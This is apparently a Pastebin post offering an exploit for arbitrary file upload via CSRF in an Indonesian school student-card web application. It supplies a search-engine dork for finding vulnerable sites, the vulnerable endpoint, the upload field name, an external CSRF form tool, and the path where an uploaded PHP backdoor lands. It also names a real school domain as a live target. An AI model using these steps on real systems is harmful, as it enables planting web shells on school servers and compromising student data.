MrOXiG3n

Aplikasi Kartu Pelajar Vulnerability

Jan 11th, 2021
150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.71 KB | None | 0 0
  1. Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with
  2. CSRF(indonesian school)
  3.  
  4. [+]Exploit title: Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF(indonesian school)
  5. [+]Author : ./meicookies
  6. [+]Dork : intext:Responsive image aplikasi kartu pelajar sch.id
  7.  
  8. [+] Exploit: kartu.localcrot.sch.id/user/aksi/ubah_pelajar.php
  9.  
  10. if there is an alert "Data Berhasil di Ubah" the fucking website is vulnerable to arbitrary file upload
  11.  
  12. [+] CSRF :
  13.  
  14. https://tools.xploitsecid.or(.)id/Exploit/CSRF
  15. postfile : gambar
  16.  
  17. [!] File Location :
  18.  
  19. The files you upload will go to
  20. kartu.localcrot.sch.id/img/your_backdoor.php
  21.  
  22. [!] Live target : http://kartu.mit-alishlah.sch.id/user/aksi/ubah_pelajar.php
Add Comment
Please, Sign In to add comment